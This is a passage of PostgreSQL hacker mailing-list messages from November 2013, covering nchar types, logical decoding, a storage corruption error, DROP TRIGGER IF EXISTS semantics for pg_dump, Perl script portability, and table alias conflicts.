Re: [HACKERS] UTF8 national character data type support WIP patch and list of open issues.

2013-11-10 Thread MauMau

From: Albe Laurenz laurenz.a...@wien.gv.at
In a way, it is similar to using the data type serial.  The column will be
displayed as integer, and the information that it was a serial can
only be inferred from the DEFAULT value.
It seems that this is working fine and does not cause many problems,
so I don't see why things should be different here.


Yes, I agree with you that serial being a synonym causes almost no problem. 
But that's because serial is not an SQL-standard data type but a type unique 
to PostgreSQL.


On the other hand, nchar is an established data type in the SQL standard.  I 
think most people will expect psql \d and pg_dump to output nchar just as 
they specified it in their DDL.  If they get char as the output for nchar 
columns from pg_dump, wouldn't they be in trouble when they want to import 
the schema/data from PostgreSQL into other database products?  The 
documentation for pg_dump says that pg_dump pays attention to easing 
migration to other DBMSs.  I like this idea and want to respect it.


http://www.postgresql.org/docs/current/static/app-pgdump.html
--
Script files can be used to reconstruct the database even on other machines 
and other architectures; with some modifications, even on other SQL database 
products.

...
--use-set-session-authorization
Output SQL-standard SET SESSION AUTHORIZATION commands instead of ALTER 
OWNER commands to determine object ownership. This makes the dump more 
standards-compatible, ...

--


Regards
MauMau



--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


[HACKERS] during the maintenance facing error

2013-11-10 Thread Nagaraj Shindagi
hi

This is Nagaraj.  While I am doing maintenance of the database I am
facing this problem; after this error the maintenance stops and I am not
able to take a backup of the database.

ERROR:  could not read block 984505 in file base/16393/2850139.7: read
only 4096 of 8192 bytes

Please help me to solve this issue

thanks in advance
-- 
Nagaraj V Shindagi


Re: [HACKERS] logical changeset generation v6.5

2013-11-10 Thread Andres Freund
On 2013-11-09 20:16:20 -0500, Steve Singer wrote:
  When I try the test_decoding plugin on UPDATE I get rows like:
 
 table do_inventory: UPDATE: ii_id[int8]:251 ii_in_stock[int8]:1
 ii_reserved[int8]:144 ii_total_sold[int8]:911
 
 which I think is only data from the new tuple.  The lack of an old key in
 the output makes me think the test_decoding plugin also isn't getting the
 old tuple.
 
 (This is with your patch-set rebased ontop of
 ac4ab97ec05ea900db0f14d428cae2e79832e02d which includes the patches Robert
 committed the other day, I can't rule out that I didn't break something in
 the rebase).
 I've pushed an updated tree to git, that contains that
 http://git.postgresql.org/gitweb/?p=users/andresfreund/postgres.git;a=shortlog;h=refs/heads/xlog-decoding-rebasing-remapping
 git://git.postgresql.org/git/users/andresfreund/postgres.git
 
 and some more fixes. I'll send out an email with details sometime soon.

 93c5c2a171455763995cef0afa907bcfaa405db4

 Still give me the following:
 update  disorder.do_inventory set ii_in_stock=2 where ii_id=251;
 UPDATE 1
 test1=# LOG:  tuple in table with oid: 35122 without primary key

Hm. Could it be that you still have an older test_decoding plugin
lying around? The current one doesn't contain that string
anymore. That'd explain the problems.
In v6.4 the output plugin API was changed so that plain heap tuples are
passed for the old key, although with non-key columns set to
NULL.  Earlier it was an index tuple as defined by the index's
TupleDesc.

 a) The table does have a primary key
 b) I don't get anything in the old key when I was expecting all the rows
 c)  If I change the table to use the pkey index with
 alter table disorder.do_inventory  replica identity using index
 do_inventory_pkey;

 The LOG message on the update goes away but the output of the test decoder
 plugin goes back to

 table do_inventory: UPDATE: ii_id[int8]:251 ii_in_stock[int8]:5
 ii_reserved[int8]:144 ii_total_sold[int8]:911

 Which I suspect means oldtuple is back to null

Which is legitimate though, if you don't update the primary (or
explicitly chosen candidate) key.  Those only get logged if there are
actual changes in those columns.
Makes sense?
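A sketch of that behavior, reusing the table from this thread and the syntax from the patch set (not released PostgreSQL at the time of writing):

```sql
-- Choose the pkey index as the replica identity (patch-set syntax)
ALTER TABLE disorder.do_inventory
  REPLICA IDENTITY USING INDEX do_inventory_pkey;

-- No key column changes: no old key is logged, oldtuple stays null
UPDATE disorder.do_inventory SET ii_in_stock = 5 WHERE ii_id = 251;

-- The key column itself changes: old key values are logged for the decoder
UPDATE disorder.do_inventory SET ii_id = 252 WHERE ii_id = 251;
```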

Greetings,

Andres Freund

--
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services




Re: [HACKERS] during the maintenance facing error

2013-11-10 Thread Andres Freund
Hi,

On 2013-11-10 20:07:41 +0530, Nagaraj Shindagi wrote:
 This is nagaraj, while  i am doing the maintenance of the database i am
 facing this problem, after this error it will stop and i am not able to
 take backup of the database.

What do you mean with "it will stop"?  You should still be able to
communicate with the database, right?

 ERROR:  could not read block 984505 in file base/16393/2850139.7: read
 only 4096 of 8192 bytes

Hm. A couple of questions:
* which operating system
* which file system (cifs? veritas?)
* Could you do a ls -l base/16393/2850139.* in the server's datadir (SHOW
  data_directory;) and send the output?
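For anyone following along, the error message itself pins down where the damage is. A hedged back-of-the-envelope sketch, assuming the standard 8 kB block size and 1 GB segment files:

```shell
# Hedged arithmetic, not a fix: locate the failing block from the error.
# PostgreSQL uses 8192-byte blocks and 1 GB segment files (131072 blocks
# per segment); the numbers below come from the error message.
block=984505
seg=$((block / 131072))             # which segment file holds the block
off=$(( (block % 131072) * 8192 ))  # byte offset inside that segment
echo "segment .$seg at byte offset $off"
# Next, compare against the actual file sizes in the data directory
# (SHOW data_directory; then: ls -l base/16393/2850139.*)
```

Block 984505 falls in segment 7, matching the .7 suffix in the error; "read only 4096 of 8192 bytes" suggests the segment file was truncated mid-block, typically filesystem-level damage.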

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services




Re: [HACKERS] UTF8 national character data type support WIP patch and list of open issues.

2013-11-10 Thread Tom Lane
MauMau maumau...@gmail.com writes:
 On the other hand, nchar is an established data type in the SQL standard.  I 
 think most people will expect to get nchar as output from psql \d and 
 pg_dump as they specified in DDL.

This argument seems awfully weak.  You've been able to say
 create table nt (nf national character varying(22));
in Postgres since around 1997, but I don't recall one single bug report
about how that is displayed as just character varying(22).

The other big problem with this line of argument is that you're trying
to claim better spec compliance for what is at best a rather narrow
interpretation with really minimal added functionality.  (In fact,
until you have a solution for the problem that incoming and outgoing
data must be in the database's primary encoding, you don't actually have
*any* added functionality, just syntactic sugar that does nothing useful.)
Unless you can demonstrate by lawyerly reading of the spec that the spec
requires exactly the behavior this patch implements, you do not have a leg
to stand on here.  But you can't demonstrate that, because it doesn't.

I'd be much more impressed by seeing a road map for how we get to a
useful amount of added functionality --- which, to my mind, would be
the ability to support N different encodings in one database, for N > 2.
But even if you think N=2 is sufficient, we haven't got a road map, and
commandeering spec-mandated syntax for an inadequate feature doesn't seem
like a good first step.  It'll just make our backwards-compatibility
problems even worse when somebody does come up with a real solution.

regards, tom lane




Re: [HACKERS] hstore extension version screwup

2013-11-10 Thread Tom Lane
Jim Nasby j...@nasby.net writes:
 On 10/3/13 12:49 PM, Magnus Hagander wrote:
 We could also use git receive hooks, but those would be very hard to
 override when you *do* need to modify the files (which you might
 within a release).

 You can have the receive hook skip the check based on the existence of an 
 override file.  It's kinda kludgey, but effective.  Of course you need to 
 remember to remove the override file when you're done overriding...

An important point here is that we don't want to lock down version m.n
of an extension *until it's shipped in a release*.  If we make several
changes in a given extension during a development cycle (some of them
possibly just bugfixes to a previous change), we don't want our tools
forcing us to treat each of those as an upgrade scenario.

This means that any restriction should only apply in the _STABLE branches,
not in master.  Not sure how to do that.
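One way to restrict the check to stable branches in a receive hook is to key off the branch name. A minimal sketch, under the assumption that release branches follow the REL*_STABLE naming convention (the contrib path pattern is likewise an assumption):

```shell
# Sketch of a pre-receive hook fragment: decide, per pushed ref, whether
# the "no edits to released extension scripts" rule should apply at all.
is_protected_ref() {
  case "$1" in
    refs/heads/REL*_STABLE) return 0 ;;  # shipped branch: enforce the rule
    *) return 1 ;;                       # master etc.: allow free changes
  esac
}

# In the real hook, for each protected ref one might then run something like
#   git diff --name-only "$old" "$new" | grep '^contrib/.*--[0-9.]*\.sql$'
# and reject the push on a match (the path pattern is illustrative only).
is_protected_ref refs/heads/REL9_3_STABLE && echo "REL9_3_STABLE: enforced"
is_protected_ref refs/heads/master || echo "master: unrestricted"
```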

regards, tom lane




Re: [HACKERS] Any reasons to not move pgstattuple to core?

2013-11-10 Thread Tom Lane
[ back from vacation and slowly catching up on email ]

Dimitri Fontaine dimi...@2ndquadrant.fr writes:
 Robert Haas robertmh...@gmail.com writes:
 I think we were going to try to group the extensions into categories
 (debugging tools, demonstration code, data types, etc.) and maybe
 encourage packagers to put the debugging tools in the same OS package
 as the core server.  But Tom was not supportive, and he was at the
 time the packager for Red Hat, so it didn't seem like we were going to
get too far with it.

 My understanding is that we wanted to promote some extensions as being
 core extensions and change the directory and documentation layout to
 encourage packagers to rethink their work.

 And my understanding of Tom's reaction is that he didn't believe the
 source directory layout has anything to do with the packaging problem,
 we should just document the extensions we want installed by default and
 packagers will know to follow us there.

 Still, *something* needs to be done here.

Since people seemed to be mentioning my opinions in this thread,
I'll weigh in with a couple of thoughts:

1. I think Dimitri's summary of my opinion is okay as far as the general
topic goes: if we want packagers to favor certain contrib modules over
others, we should just tell them so.  No need to complicate our own lives
by rearranging the source tree.

2. As far as pgstattuple in particular goes, I would not be at all
in favor of pushing it into core in its current form.  It's an ugly
hodgepodge of functions that weren't too well designed to start with
and aren't even mutually consistent.  We could take the opportunity
to redesign, perhaps, if we were going to put such functionality in
core --- but please let's not just push over what's there.

regards, tom lane




Re: [HACKERS] logical changeset generation v6.5

2013-11-10 Thread Steve Singer

On 11/10/2013 09:41 AM, Andres Freund wrote:

Still give me the following:
update  disorder.do_inventory set ii_in_stock=2 where ii_id=251;
UPDATE 1
test1=# LOG:  tuple in table with oid: 35122 without primary key
Hm. Could it be that you still have an older test_decoding plugin
lying around? The current one doesn't contain that string
anymore. That'd explain the problems.
In v6.4 the output plugin API was changed so that plain heap tuples are
passed for the old key, although with non-key columns set to
NULL.  Earlier it was an index tuple as defined by the index's
TupleDesc.


Grrr, yah, that was the problem: I had compiled but not installed the 
newer plugin.  Sorry.




a) The table does have a primary key
b) I don't get anything in the old key when I was expecting all the rows
c)  If I change the table to use the pkey index with
alter table disorder.do_inventory  replica identity using index
do_inventory_pkey;

The LOG message on the update goes away but the output of the test decoder
plugin goes back to

table do_inventory: UPDATE: ii_id[int8]:251 ii_in_stock[int8]:5
ii_reserved[int8]:144 ii_total_sold[int8]:911

Which I suspect means oldtuple is back to null

Which is legitimate though, if you don't update the primary (or
explicitly chosen candidate) key.  Those only get logged if there are
actual changes in those columns.
Makes sense?

Is the expectation that plugin writers will call
RelationGetIndexAttrBitmap(relation, INDEX_ATTR_BITMAP_IDENTITY_KEY);
to figure out what the identity key is?

How do we feel about having the decoder logic populate change.oldtuple 
with the identity on UPDATE statements when it is null?  The logic I have 
now is to use oldtuple if it is not null, otherwise go figure out which 
columns from the identity key we should be using.  I think most plugins 
that do anything useful with an update will need to duplicate that.
Greetings,

Andres Freund

--
  Andres Freund                     http://www.2ndQuadrant.com/
  PostgreSQL Development, 24x7 Support, Training & Services








Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Tom Lane
Peter Eisentraut pete...@gmx.net writes:
 On 10/11/13 3:57 AM, Tom Lane wrote:
 What about unused_oids?

 We are not planning to put unused_oids in to the main build path, so
 there is much less of a need to make it more portable or robust.

 Also, as we have just (re-)learned, you cannot rely on /usr/bin/perl
 being there, so rewriting unused_oids in Perl would arguably make it
 less usable.

I'd argue the opposite --- the existing shell-script version is entirely
useless to developers running on Windows, while they could use a Perl
version.  Also, we've pretty much locked in the assumption that developers
will have Perl.

I've not actually looked at Andrew's script yet, but if it works I think
we should replace the shell script.

regards, tom lane




Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Peter Geoghegan
On Sun, Nov 10, 2013 at 1:07 PM, Tom Lane t...@sss.pgh.pa.us wrote:
 I'd argue the opposite --- the existing shell-script version is entirely
 useless to developers running on Windows, while they could use a Perl
 version.  Also, we've pretty much locked in the assumption that developers
 will have Perl.

+1.

-- 
Peter Geoghegan




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
[ catching up on old email ]

Andres Freund and...@2ndquadrant.com writes:
 On 2013-10-15 00:23:15 +0200, Tomas Vondra wrote:
 On 2013-10-10 12:54:23 -0400, Andrew Dunstan wrote:
 This thread seems to have gone cold, but I'm inclined to agree with
 Pavel. If the table doesn't exist, neither does the trigger, and
 the whole point of the 'IF EXISTS' variants is to provide the
 ability to issue DROP commands that don't fail if their target is
 missing.

 -1, this seems too likely to just hide typos.

 Because there simply is no reason to issue a DROP TRIGGER IF EXISTS if
 you don't need the contents of the table. In that case you can just
 issue a DROP TABLE IF EXISTS and start anew.

I think this is nonsense.  It's only one step removed from "why do you
need IF EXISTS at all, you should know whether the object is there".
The entire point of this syntax is to not need to do detailed analysis
about whether the object is there.

The pg_dump --clean use-case is sufficient refutation for that, IMO.
You're suggesting that pg_dump should make a special case out of what it
emits for cleaning a trigger; which we could do I guess, but it would be
ugly and fragile.  For instance, the special case would probably soon grow
some warts for partial-dump scenarios.  Anyway, pg_dump is not the only tool
that might wish to use DROP IF EXISTS.

regards, tom lane




Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Andrew Dunstan


On 11/10/2013 04:16 PM, Peter Geoghegan wrote:

On Sun, Nov 10, 2013 at 1:07 PM, Tom Lane t...@sss.pgh.pa.us wrote:

I'd argue the opposite --- the existing shell-script version is entirely
useless to developers running on Windows, while they could use a Perl
version.  Also, we've pretty much locked in the assumption that developers
will have Perl.

+1.




It might be a bit more portable if we replaced the shebang lines on perl 
scripts with


   #!/bin/env perl

That's probably worth considering. MSVC users would still have to call 
"perl scriptname" or possibly "\path\to\perl scriptname", but I think 
that's OK, and they will have to do that anyway.


cheers

andrew




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 16:28:27 -0500, Tom Lane wrote:
 [ catching up on old email ]
 
 Andres Freund and...@2ndquadrant.com writes:
  On 2013-10-15 00:23:15 +0200, Tomas Vondra wrote:
  On 2013-10-10 12:54:23 -0400, Andrew Dunstan wrote:
  This thread seems to have gone cold, but I'm inclined to agree with
  Pavel. If the table doesn't exist, neither does the trigger, and
  the whole point of the 'IF EXISTS' variants is to provide the
  ability to issue DROP commands that don't fail if their target is
  missing.
 
  -1, this seems too likely to just hide typos.
 
  Because there simply is no reason to issue a DROP TRIGGER IF EXISTS if
  you don't need the contents of the table. In that case you can just
  issue a DROP TABLE IF EXISTS and start anew.
 
 I think this is nonsense.  It's only one step removed from why do you
 need IF EXISTS at all, you should know whether the object is there.
 The entire point of this syntax is to not need to do detailed analysis
 about whether the object is there.

Well, in my opinion the IF EXISTS refers to the object type being
dropped. I.e. with DROP TABLE it refers to the table not existing, with
DROP TRIGGER it refers to the trigger not existing.
Note how we also error out if you do something like:
ALTER TABLE nonexistant DROP COLUMN IF EXISTS bar;
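To make the asymmetry concrete (hypothetical object names; this sketches the behavior as described in the thread, not a proposal):

```sql
DROP TABLE IF EXISTS no_such_table;                 -- succeeds with a notice
DROP TRIGGER IF EXISTS trg ON no_such_table;        -- errors: the table is missing
ALTER TABLE no_such_table DROP COLUMN IF EXISTS c;  -- errors: the table is missing
```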

 The pg_dump --clean use-case is sufficient refutation for that, IMO.
 You're suggesting that pg_dump should make a special case out of what it
 emits for cleaning a trigger; which we could do I guess, but it would be
 ugly and fragile.  For instance, the special case would probably soon grow
 some warts for partial-dump scenarios.

ISTM the only way to get a DROP TRIGGER that actually is required is a
--section=post-data dump. In the other cases it will get dropped by the
DROP TABLE that's executed shortly afterwards. But in that case we'll
currently error out during the CREATE TRIGGER shortly afterwards if the
table doesn't exist...
Maybe the way to fix this properly is to not drop post-data objects that
are implicitly dropped by the object that owns them.

Anyway, pg_dump is not the only tool that might wish to use DROP IF EXISTS.

Well, I am absolutely not arguing against DROP TRIGGER IF EXISTS
(which we already have), just against it ignoring nonexistent tables
instead of just nonexistent triggers.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services




Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Tom Lane
Andrew Dunstan and...@dunslane.net writes:
 It might be a bit more portable if we replaced the shebang lines on perl 
 scripts with
 #!/bin/env perl

Perhaps, if we're worried about people keeping perl somewhere other
than /usr/bin.  However, the most likely reason for having a
/usr/local/bin/perl or whatever is that it's a newer and shinier one
than what's in /usr/bin.  Since we're only interested in bog-standard
perl, there's no real reason for us to want to pick up the local one.

FWIW, there was a big discussion at Red Hat a few years ago about whether
to run around and do that to all perl/python scripts, and the outcome of
the discussion was that using env was deprecated, not encouraged.  I don't
remember the reasoning in detail, but I think the core idea was that if a
distro knows they ship perl in /usr/bin, then inserting env into the
equation doesn't do anything but add cycles and failure modes.  I'm not
sure that that argument applies too well to our scenario, but it's out
there.  The particular application to this case might be: what makes
you so sure env is in /bin?
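Tom's closing question is easy to check empirically. A quick sketch (results vary by platform, which is rather the point):

```shell
# Where does env actually live on this machine?
command -v env          # commonly /usr/bin/env on Linux and the BSDs
# The proposed shebang above hardcodes /bin/env, which many systems
# only provide via a /bin -> /usr/bin merge, if at all:
if [ -e /bin/env ]; then echo "/bin/env exists"; else echo "no /bin/env"; fi
```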

regards, tom lane




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 On 2013-11-10 16:28:27 -0500, Tom Lane wrote:
 I think this is nonsense.  It's only one step removed from why do you
 need IF EXISTS at all, you should know whether the object is there.
 The entire point of this syntax is to not need to do detailed analysis
 about whether the object is there.

 Well, in my opinion the IF EXISTS refers to the object type being
 dropped. I.e. with DROP TABLE it refers to the table not existing, with
 DROP TRIGGER it refers to the trigger not existing.

Then I take it you also think we should undo the changes that made
DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
Because after all, the schema is not the object being dropped.

regards, tom lane




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 18:16:16 -0500, Tom Lane wrote:
 Andres Freund and...@2ndquadrant.com writes:
  On 2013-11-10 16:28:27 -0500, Tom Lane wrote:
  I think this is nonsense.  It's only one step removed from why do you
  need IF EXISTS at all, you should know whether the object is there.
  The entire point of this syntax is to not need to do detailed analysis
  about whether the object is there.
 
  Well, in my opinion the IF EXISTS refers to the object type being
  dropped. I.e. with DROP TABLE it refers to the table not existing, with
  DROP TRIGGER it refers to the trigger not existing.
 
 Then I take it you also think we should undo the changes that made
 DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
 Because after all, the schema is not the object being dropped.

No, not the same thing imo, although I find that change debatable.

Anyway, if we're going to change DROP TRIGGER at the very least ALTER
TABLE ... DROP CONSTRAINT also needs to be changed, otherwise we'll gain
nothing.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 On 2013-11-10 18:16:16 -0500, Tom Lane wrote:
 Then I take it you also think we should undo the changes that made
 DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
 Because after all, the schema is not the object being dropped.

 No, not the same thing imo, although I find that change debatable.

 Anyway, if we're going to change DROP TRIGGER at the very least ALTER
 TABLE ... DROP CONSTRAINT also needs to be changed, otherwise we'll gain
 nothing.

That would be a plausible next step, but I don't have a problem with
this patch not solving every case like this at once.

regards, tom lane




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 18:26:26 -0500, Tom Lane wrote:
 Andres Freund and...@2ndquadrant.com writes:
  On 2013-11-10 18:16:16 -0500, Tom Lane wrote:
  Then I take it you also think we should undo the changes that made
  DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
  Because after all, the schema is not the object being dropped.
 
  No, not the same thing imo, although I find that change debatable.
 
  Anyway, if we're going to change DROP TRIGGER at the very least ALTER
  TABLE ... DROP CONSTRAINT also needs to be changed, otherwise we'll gain
  nothing.
 
 That would be a plausible next step, but I don't have a problem with
 this patch not solving every case like this at once.

Well, there are relatively few tables without primary keys around that
have triggers. The dumps currently look like:
DROP TRIGGER foo ON public.foo;
ALTER TABLE ONLY public.foo DROP CONSTRAINT foo_pkey;
ALTER TABLE public.foo ALTER COLUMN id DROP DEFAULT;
DROP SEQUENCE public.foo_id_seq;
DROP TABLE public.foo;
So we'd get approximately one line further unless we fix this for DROP
DEFAULT and DROP CONSTRAINT as well.
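For comparison, a sketch of what a fully existence-tolerant version of that cleanup could look like. Hedge: not every IF EXISTS variant shown here existed at the time of this discussion, so this is the target shape rather than actual pg_dump output:

```sql
DROP TRIGGER IF EXISTS foo ON public.foo;  -- still errors if public.foo is
                                           -- absent: the bug under discussion
ALTER TABLE IF EXISTS ONLY public.foo DROP CONSTRAINT IF EXISTS foo_pkey;
ALTER TABLE IF EXISTS public.foo ALTER COLUMN id DROP DEFAULT;
DROP SEQUENCE IF EXISTS public.foo_id_seq;
DROP TABLE IF EXISTS public.foo;
```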

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 ... So we'd get approximately one line further unless we fix this for DROP
 DEFAULT and DROP CONSTRAINT as well.

True.  As far as pg_dump --clean is concerned, it'd undoubtedly be easier
if we did what you suggest and just eliminated the emitted DROP commands
for table components, relying on the assumption that there'll never be
a partial-dump mode that would allow dumping a table's components without
the table.  However, the server-side approach has the benefit that it'll
likely make life easier for other applications besides pg_dump.

regards, tom lane




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 18:42:11 -0500, Tom Lane wrote:
 Andres Freund and...@2ndquadrant.com writes:
  ... So we'd get approximately one line further unless we fix this for DROP
  DEFAULT and DROP CONSTRAINT as well.

Turns out that's bogus - ALTER TABLE has two levels of IF EXISTS.

Maybe we should just do the same for DROP TRIGGER?

DROP TRIGGER [ IF EXISTS ] name ON table_name [ IF EXISTS ] [ CASCADE | 
RESTRICT ]


 However, the server-side approach has the benefit that it'll
 likely make life easier for other applications besides pg_dump.

I am unconvinced that that's the case when using the existing IF EXISTS
for DROP TRIGGER, but my complaints would be completely addressed by
making it a separate flag.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training & Services




Re: [HACKERS] all_visible replay aborting due to uninitialized pages

2013-11-10 Thread Noah Yetter
Like your customer, this bug has blown up my standby servers, twice in the
last month: the first time all 4 replicas, the second time (mysteriously
but luckily) only 1 of them.

At any rate, since the fix isn't available yet, is/are there any
configuration changes that can be made or maintenance procedures that can
be undertaken to prevent or reduce the probability of this bug popping up
again in the meantime?  I really can't afford to be without my standby
servers during the holidays, even for the few hours it takes to build a new
one.


On Tue, May 28, 2013 at 11:58 AM, Andres Freund and...@2ndquadrant.com wrote:

 Hi,

 A customer of ours reported a standby losing sync with the primary due
 to the following error:
 CONTEXT:  xlog redo visible: rel 1663/XXX/XXX; blk 173717
 WARNING:  page 173717 of relation base/XXX/XXX is uninitialized
 ...
 PANIC:  WAL contains references to invalid pages

 Guessing around I looked and noticed the following problematic pattern:
 1) A: wants to do an update, doesn't have enough freespace
 2) A: extends the relation on the filesystem level
 (RelationGetBufferForTuple)
 3) A: does PageInit (RelationGetBufferForTuple)
 4) A: aborts, e.g. due to a serialization failure (heap_update)

 At this point the page is initialized in memory, but not wal logged. It
 isn't pinned or locked either.

 5) B: vacuum finds that page and it's empty. So it marks it all
 visible. But since the page wasn't written out (we haven't even marked
 it dirty in 3.) the standby doesn't know that and reports the page as
 being uninitialized.

 ISTM the best backbranchable fix for this is to teach lazy_scan_heap to
 log an FPI for the heap page via visibilitymap_set in that rather
 limited case.

 Happy to provide a patch unless somebody has a better idea?

 Greetings,

 Andres Freund

 --
  Andres Freund http://www.2ndQuadrant.com/
  PostgreSQL Development, 24x7 Support, Training & Services





Re: [HACKERS] all_visible replay aborting due to uninitialized pages

2013-11-10 Thread Andres Freund
Hi,

On 2013-11-10 17:40:31 -0700, Noah Yetter wrote:
 Like your customer, this bug has blown up my standby servers, twice in the
 last month: the first time all 4 replicas, the second time (mysteriously
 but luckily) only 1 of them.
 
 At any rate, since the fix isn't available yet, is/are there any
 configuration changes that can be made or maintenance procedures that can
 be undertaken to prevent or reduce the probability of this bug popping up
 again in the meantime?  I really can't afford to be without my standby
 servers during the holidays, even for the few hours it takes to build a new
 one.

The fix is included in 9.2.5; it's just not noted in the release notes.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services




[HACKERS] Relax table alias conflict rule in 9.3?

2013-11-10 Thread Tom Lane
We had a complaint
http://www.postgresql.org/message-id/e1vjuby-0002a1...@wrigleys.postgresql.org
about the fact that 9.3 rejects queries with duplicate table aliases like
this:

select * from tenk1 a left join (int4_tbl a cross join int8_tbl b) c on unique1 = f1;
ERROR:  table name "a" specified more than once

I pushed back on this on the grounds that this is illegal per SQL spec:
the standard is pretty clear that you can't use the same table alias more
than once in a given level of SELECT (cf. SQL:2008 7.6 "table reference",
syntax rules 6 and 7).  However, the complainant has a good point that if
we've accepted this since forever, ceasing to accept it is going to cause
people problems.  Moreover, my argument that it makes things ambiguous for
LATERAL doesn't hold a lot of water.  Duplicate table aliases were
potentially ambiguous before, too, but we allowed the case anyway and only
complained if there's actually an ambiguous reference.  We could do the
same for LATERAL references.

I poked into the code a bit and soon realized that the problem stems from
the checkNameSpaceConflicts call that I added to transformFromClauseItem
in the LATERAL patch (in HEAD, line 729 of parse_clause.c).  That throws
an error if the left side of a JOIN exposes any aliases that are already
exposed at top level of the FROM clause.  There's no such check pre-9.3,
and I'm not sure now why I thought it was appropriate here, since the
column-reference lookup code is perfectly capable of dealing with
ambiguous references.  Taking out that call allows the above query to work
again, while changing no existing regression test results.  Cases that are
actually ambiguous will throw an appropriate error:

select * from tenk1 a left join (int4_tbl a cross join lateral (select a.f1) b) c on unique1 = f1;
ERROR:  table reference "a" is ambiguous
LINE 1: ... left join (int4_tbl a cross join lateral (select a.f1) b) ...
                                                             ^

This discovery also shows that there's nothing particularly principled
about 9.3's behavior, because it complains about
select * from tenk1 a left join (int4_tbl a cross join int8_tbl b) c on unique1 = f1;
but it's perfectly happy with
select * from tenk1 a left join (int4_tbl b cross join int8_tbl a) c on unique1 = f1;

So I propose removing that call, adding regression tests like these
examples, and back-patching to 9.3.  Any objections?

regards, tom lane




Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 Turns out that's bogus - ALTER TABLE has two levels of IF EXISTS.

 Maybe we should just do the same for DROP TRIGGER?

 DROP TRIGGER [ IF EXISTS ] name ON table_name [ IF EXISTS ] [ CASCADE | RESTRICT ]

Works for me.
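For illustration, the proposed two-level syntax would behave roughly like
this (a sketch of the proposal under discussion, not committed syntax;
my_trig and my_table are hypothetical names):

```sql
-- Existing behavior: IF EXISTS only covers a missing trigger;
-- a missing table still raises an error
DROP TRIGGER IF EXISTS my_trig ON my_table;

-- Proposed: a second IF EXISTS would also tolerate a missing table,
-- which is what pg_restore --clean needs
DROP TRIGGER IF EXISTS my_trig ON my_table IF EXISTS;
```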

regards, tom lane




Re: [HACKERS] Another bug(?) turned up by the llvm optimization checker

2013-11-10 Thread Tom Lane
Greg Stark st...@mit.edu writes:
 The commit below, specifically the change mentioned in the last paragraph
 to fix isLockedRel broke the following comment in addRangeTableEntry:

  * If pstate is NULL, we just build an RTE and return it without adding it
  * to an rtable list.

 In fact isLockedRefname() will seg fault promptly if pstate is NULL. I'm
 not clear why this behaviour is needed though since as far as I can tell
 nowhere in the code calls addRangeTableEntry or any of its derivatives with
 pstate==NULL. I'm inclined to just remove the comment and the test for
 pstate==NULL lower down but I don't really know what the motivation for
 this promised behaviour was in the first place so I'm hesitant to do it on
 my own.

Hm.  I think you are right that this is dead code at the moment, but if
you look around you'll find that there are several places that call
addRangeTableEntry's sister routines with NULL pstate, eg look at the
addRangeTableEntryForRelation calls in view.c.  There may once have been
code that called plain addRangeTableEntry that way, or maybe not, but
I'm inclined to think we ought to keep the API contracts similar for
all those functions.

However, that logic doesn't immediately say whether it's better to
make these functions safe against null pstate arguments, or to insist
the callers conjure up a pstate.  After a quick look at the number
of pstate uses that have evolved in the addRangeTableEntryForFoo
functions, I'm inclined to think the latter might be the safer
course of action.  It's not that hard to make a dummy pstate, and we
could delete the logic for a null pstate argument in multiple places,
without worrying about whether the need to defend against null pstate
will propagate into called functions.

In any case, the issue looks bigger than just addRangeTableEntry
itself.  Do you want to write up a patch?
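A minimal sketch of the "conjure up a pstate" approach, using the existing
make_parsestate()/free_parsestate() helpers (argument list abbreviated;
the exact addRangeTableEntryForRelation signature varies by branch):

```c
/* Sketch: instead of passing pstate == NULL, callers build a dummy one */
ParseState *pstate = make_parsestate(NULL);   /* no parent state */

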